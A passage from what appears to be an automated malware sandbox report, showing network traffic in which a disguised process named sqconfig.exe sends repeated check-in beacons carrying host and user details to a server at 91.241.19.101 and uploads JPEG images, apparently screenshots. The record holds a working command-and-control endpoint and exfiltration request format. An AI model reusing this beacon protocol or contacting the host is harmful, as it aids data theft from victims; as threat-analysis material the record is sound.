                                                                  Sep 30, 2021 23:53:18.586646080 CEST15398OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:18.587097883 CEST15400OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:18.587289095 CEST15403OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:18.587315083 CEST15411OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:18.797832012 CEST15444INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  87192.168.2.34989591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:18.436255932 CEST15369OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:18.630676985 CEST15443INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  88192.168.2.34989691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:18.857175112 CEST15444OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:19.040000916 CEST15445INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:19.241259098 CEST15445OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:19.241350889 CEST15445OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:19.241503954 CEST15455OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:19.241559029 CEST15458OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:19.362520933 CEST15464OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:19.362637997 CEST15466OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:19.362807989 CEST15485OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:19.485652924 CEST15491OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:19.485687017 CEST15504OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:53:19.485833883 CEST15517OUTData Raw: ea cc 27 5f b7 c8 04 f6 69 63 28 50 17 7c 09 b4 2a 1c 0e db 57 9e a7 bf 53 54 85 2d 3f 67 17 ba 0f 69 25 b3 34 61 d7 f5 78 2e 3c e5 bb 47 26 da 3b 56 8e 58 23 92 27 8a 30 02 2b c6 ca 55 b1 81 8c 82 72 33 d7 9a 9e 2f 14 eb 70 de 49 76 2e 2d 5a 67
                                                                  Data Ascii: '_ic(P|*WST-?gi%4ax.<G&;VX#'0+Ur3/pIv.-Zg12X-!`tE=.;<#fv9,OROsV4FID0YX`A9vV7w5{{%Xm.p^&N[zZ#:YoltE{I-j]
                                                                  Sep 30, 2021 23:53:19.485853910 CEST15522OUTData Raw: af b9 4a a3 5f d7 95 bf 23 b7 b9 d7 74 6b 89 3f b3 ae af a3 6f b5 e9 9f 62 bb d4 6c ad 9a 3b 78 dc 4c 24 8c a4 3b 57 08 36 80 c1 51 79 2c 40 27 93 95 a4 1d 27 46 d7 23 b7 b8 d6 61 b9 d3 af 6d e4 b5 bd b8 b4 86 5d b1 23 8c 02 03 aa b3 15 21 5b 01
                                                                  Data Ascii: J_#tk?obl;xL$;W6Qy,@''F#am]#![{g;F_7zxVu&Ve}fu_D&#d{t-2Kl5X_O%Acw"3OGh'?iw{wu}2ko;Yqr)$ip\pxHMA
                                                                  Sep 30, 2021 23:53:19.676223040 CEST15532INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  89192.168.2.34989791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:19.463560104 CEST15485OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:19.655582905 CEST15532INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.34976891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:52.250096083 CEST7325OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:52.488538027 CEST7339INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  90192.168.2.34989891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:19.892334938 CEST15533OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:20.109476089 CEST15547INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  91192.168.2.34989991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:20.011205912 CEST15534OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:20.011296988 CEST15534OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:20.011456966 CEST15544OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:20.011531115 CEST15547OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:20.144738913 CEST15560OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:20.144813061 CEST15567OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:20.144833088 CEST15572OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:20.280673027 CEST15588OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:20.280754089 CEST15596OUTData Raw: 15 bf e2 75 ce a0 bf ee 0a c6 58 ce 2b 97 0a ff 00 75 11 e3 22 dd 66 43 8e 69 c0 73 de a6 11 7b 54 8b 03 1e 8a 6b 67 34 8c 15 29 3e 85 60 b4 e0 86 ae a5 94 ad d1 1b f2 ab 09 a5 5c 3f fc b3 6a cd d6 8a dd 9b 47 0f 37 d0 cc 09 52 04 f6 ad 75 d1 67
                                                                  Data Ascii: uX+u"fCis{Tkg4)>`\?jG7Rug WHUY2/Y<LVf(OjxLViSYK}*}LA-33RZu&/6=j&<W_Ua4T'__k){:~l7pL2c
                                                                  Sep 30, 2021 23:53:20.281009912 CEST15599OUTData Raw: 8c 93 dc fc a3 00 7b 9a c2 82 7f 17 f8 81 45 dd b4 b6 fa 2d 93 f3 12 bc 42 59 59 7b 12 08 c7 3f 85 41 ac a0 bd 9f c1 9a 6c dc db 4c 7c d9 13 b3 14 8d 48 07 db 93 f9 d4 9e 35 d6 75 1b 7d 4f 4c d2 34 fb b4 b1 fb 59 25 ee 5f 1c 0c e0 0c f6 ff 00 f5
                                                                  Data Ascii: {E-BYY{?AlL|H5u}OL4Y%_TPTR%u|]Eik1"Tl-A%1\MSn!}z:%!M?=.|bG?*+V5giP[Wv
                                                                  Sep 30, 2021 23:53:20.281081915 CEST15602OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:20.477394104 CEST15621INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  92192.168.2.34990091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:20.353724003 CEST15620OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:20.535902023 CEST15622INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  93192.168.2.34990291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:21.313916922 CEST15625OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:21.524507046 CEST15641INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  94192.168.2.34990491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:21.468862057 CEST15627OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:21.469218969 CEST15628OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
